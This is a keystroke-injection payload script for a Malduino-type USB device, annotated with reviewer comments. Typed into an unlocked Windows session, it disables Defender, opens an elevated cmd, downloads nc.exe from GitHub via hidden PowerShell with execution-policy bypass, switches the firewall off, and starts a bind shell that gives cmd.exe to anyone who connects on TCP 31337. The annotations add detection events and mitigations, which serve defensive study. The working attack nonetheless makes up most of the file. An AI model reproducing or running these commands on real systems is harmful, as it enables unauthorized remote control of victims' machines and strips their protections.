malduino_nc_reverse_shell.txt
REM Review annotations: keystroke-injection payload for a Malduino-type USB HID
REM device, typed into an unlocked Windows session. Visible stages:
REM   1. switch off Windows Defender real-time protection through the Settings UI
REM   2. open an elevated cmd.exe from the Run dialog
REM   3. write SCHANNEL TLS 1.3 and .NET TLS registry values
REM   4. download a file from GitHub and save it as nc.exe in %temp%
REM   5. turn the Windows firewall off for all profiles
REM   6. start nc.exe listening on TCP 31337 with cmd.exe attached
REM NOTE(review): the file name says "reverse shell", but stage 6 uses -L/-p
REM (listen mode), not an outbound connection. Detection should therefore look
REM for a new listening socket on 31337 and inbound connections to it.
REM NOTE(review): both ALT y keystrokes presumably answer a UAC consent prompt.
REM That only works when the signed-in user is a local administrator; a standard
REM user is asked for credentials instead, so least privilege, workstation
REM locking and USB/HID device-control policy are the relevant mitigations.
DELAY 1000
REM Open Windows Defender settings
REM (Start menu search; the typed string assumes an English-language UI.)
CTRL ESC
DELAY 1000
STRING Windows Defender Settings
DELAY 100
ENTER
REM Navigate to realtime protection and disable it
REM The ENTER/TAB/SPACE sequence is positional UI navigation; which control each
REM key lands on depends on the Windows build - TODO confirm against a target build.
REM Detection: Defender operational log event 5001 (real-time protection disabled).
DELAY 1000
ENTER
DELAY 1000
ENTER
DELAY 1000
TAB
DELAY 250
TAB
DELAY 250
TAB
DELAY 250
TAB
ENTER
DELAY 1000
SPACE
DELAY 1000
REM Presumably accepts the elevation prompt raised by the toggle above.
ALT y
DELAY 500
REM Close the settings windows.
ALT F4
DELAY 100
ALT F4
DELAY 100
REM Run dialog -> cmd, launched with CTRL SHIFT ENTER (run as administrator).
REM Detection: cmd.exe started elevated from the Run dialog (parent explorer.exe).
GUI r
DELAY 200
STRING cmd
DELAY 200
CTRL SHIFT ENTER
DELAY 500
ALT y
DELAY 500
ESC
REM Work from the user's temp directory; the downloaded file is written here.
STRING cd %temp%
ENTER
REM Registry stage: the commands below target the SCHANNEL "TLS 1.3" Server key
REM (Enabled=0, DisabledByDefault=1), create the "TLS 1.3" Client key, and set
REM .NET SystemDefaultTlsVersions=1. NOTE(review): presumably intended to make the
REM later HTTPS download negotiate successfully - the page does not say.
REM Any values written here persist after the session and are not reverted by
REM this script; incident cleanup should check and restore these keys.
REM Detection: every powershell.exe call uses -executionpolicy bypass -noprofile
REM -windowstyle hidden; process-creation logging (Security 4688 with command
REM line, or Sysmon event 1) and PowerShell script block logging (4104) record them.
STRING powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {New-Item 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.3\Server' -Force}
DELAY 100
ENTER
STRING powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {New-ItemProperty -path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.3\Server' -name 'Enabled' -value '0' -PropertyType 'DWord' -Force}
DELAY 100
ENTER
STRING powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {New-ItemProperty -path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.3\Server' -name 'DisabledByDefault' -value 1 -PropertyType 'DWord' -Force}
DELAY 100
ENTER
STRING powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {New-Item 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.3\Client' -Force}
DELAY 100
ENTER
STRING powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {reg add HKLM\SOFTWARE\Microsoft\.NETFramework\v4.0.30319 /v SystemDefaultTlsVersions /t REG_DWORD /d 1 /f /reg:64}
DELAY 100
ENTER
REM Download stage: WebClient.DownloadFile fetches nc.bin from
REM raw.githubusercontent.com and saves it as nc.exe in the current directory.
REM No hash or signature check is performed on the downloaded file.
REM Detection: powershell.exe making an outbound HTTPS request followed by a new
REM .exe written under %temp%; the .bin -> .exe rename sidesteps extension-based
REM download filtering, so content inspection or hash reputation is needed.
STRING powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden "(New-Object System.Net.WebClient).DownloadFile('https://raw.githubusercontent.com/pcmarcon/malduino-payload-samples/master/bin/nc.bin', 'nc.exe')"
DELAY 100
ENTER
DELAY 2000
REM Firewall stage: disables the Windows firewall for all profiles.
REM The script never re-enables it, so the host stays exposed until it is restored.
REM Detection: netsh.exe with "advfirewall ... state off" in process-creation logs.
STRING netsh advfirewall set allprofiles state off
DELAY 100
ENTER
REM Listener stage: runs %temp%\nc.exe with -Lp 31337 -vv -e cmd.exe, i.e. a
REM listener on TCP 31337 that hands cmd.exe to whoever connects, with no
REM authentication or encryption, from the elevated prompt opened earlier.
REM Detection: unsigned binary executing from %temp%, a cmd.exe child of nc.exe,
REM and a listening socket on 31337.
STRING powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden "%temp%\nc.exe -Lp 31337 -vv -e cmd.exe"
DELAY 100
ENTER
REM Close the visible cmd window.
STRING exit
DELAY 100
ENTER